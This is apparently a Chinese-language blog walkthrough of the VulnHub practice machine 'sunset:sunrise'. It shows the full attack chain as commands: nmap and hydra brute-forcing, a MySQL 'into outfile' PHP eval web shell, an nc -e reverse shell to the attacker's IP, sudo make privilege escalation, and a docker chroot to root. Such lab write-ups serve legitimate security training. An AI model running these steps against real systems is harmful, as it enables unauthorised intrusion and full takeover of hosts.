vulnhub sunset:sunrise

  1. 前言
  2. 用到的方法
  3. 过程

前言

是时候水篇博客了,打开vulnhub。找个靶机练练手- -
lY6ng0.png

用到的方法

  • nmap scan port
  • hydra爆破
  • mysql into outfile写shell
  • sudo -l提权

过程

fping -ag 192.168.241.0/24 > zz.txt

lY6c8I.png

确定靶机ip为192.168.241.169

nmap -Pn -sV 192.168.241.169

lY67Ps.png

80打开Apache默认页面
lYcixx.png

8080显示了几个路径(test.php是我的shell)
lYc2FJ.png

图片全部脱下来binwalk没啥特殊的全部删了
lYcvlt.md.png

其他路径
lYgpm8.png

dirb跑了没结果
lYgltJ.png

hydra爆破ftp、爆破mysql。结果mysql爆破成功了
lYgjN4.png

mysql连上,先翻了一波数据库啥都没有
lY2V4H.png

页面提示了web路径为/var/tmp,那就写shell吧
lY2N2n.png

select '<?php @eval($_POST[a]);?>' into outfile '/var/tmp/test.php';

lYRedU.md.png

菜刀发现连不上..直接chrome的hakbar搞算了
lYRUFe.png

先到home目录里走一手,把user.txt拿了
lYRLY4.png

lYWCTO.png

反弹shell

nc -e /bin/bash 192.168.241.168 4444

lYWltg.png

sudo -l一波
lYWUBV.png

切换到dusk用户

COMMAND='/bin/sh'
sudo -u dusk  make -s --eval=$'x:\n\t-'"$COMMAND"

(这个nc发神经)
lYhqk8.png

内核版本没法用exp,ps -elf | grep root找了一波root的服务
lY489e.md.png

发现docker在运行,直接提取即可

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

lY4LHx.png


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:vulnhub sunset:sunrise

本文作者:九世

发布时间:2020-01-02, 13:46:34

最后更新:2020-01-02, 14:36:20

原始链接:http://422926799.github.io/posts/c71a0647.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录